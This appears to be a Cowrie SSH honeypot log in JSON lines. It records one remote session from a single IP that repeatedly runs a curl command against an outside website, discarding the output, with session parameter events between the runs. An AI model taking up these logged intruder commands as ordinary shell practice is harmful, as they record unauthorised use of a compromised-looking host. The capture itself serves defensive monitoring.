{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.335914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.374357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.375704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.420975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.422032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.463354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.464311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.508022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.509180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.547704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.548998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.585982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.587071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.637846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.639020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.686655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.687826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.725085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.726179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.765691Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.766818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.807775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.808688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.851387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.852400Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.898583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.899550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.943776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.944734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.987921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.989187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.029606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.030610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.071413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.072327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.205463Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.206651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.296403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.297310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.337566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.338576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.376821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.377723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.415198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.416078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.452853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.453785Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.490755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.491618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.530555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.531600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.571601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.572733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.609859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.610759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.657231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.658293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.695356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.696683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.733427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.734354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.771767Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.772769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.809468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.810557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.847478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.848594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.885449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.886543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.923678Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.924603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:20.963965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:20.965083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.006144Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.007519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.063688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.064804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.102879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.103917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.143075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.145229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.191815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.192943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.265702Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.266903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.317439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.318581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.369263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.370378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.410360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.411371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.448983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.450088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.496191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.497416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.545560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.546608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.584811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.586046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.623883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.625165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.662321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.663640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.700589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.701638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.739694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.740796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.802919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.804293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.861999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.862994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.913404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.914369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:21.956176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:21.957151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.005810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.006788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.043692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.044621Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.089516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.090763Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.132972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.134001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.175033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.176219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.214217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.215129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.257567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.258564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.300085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
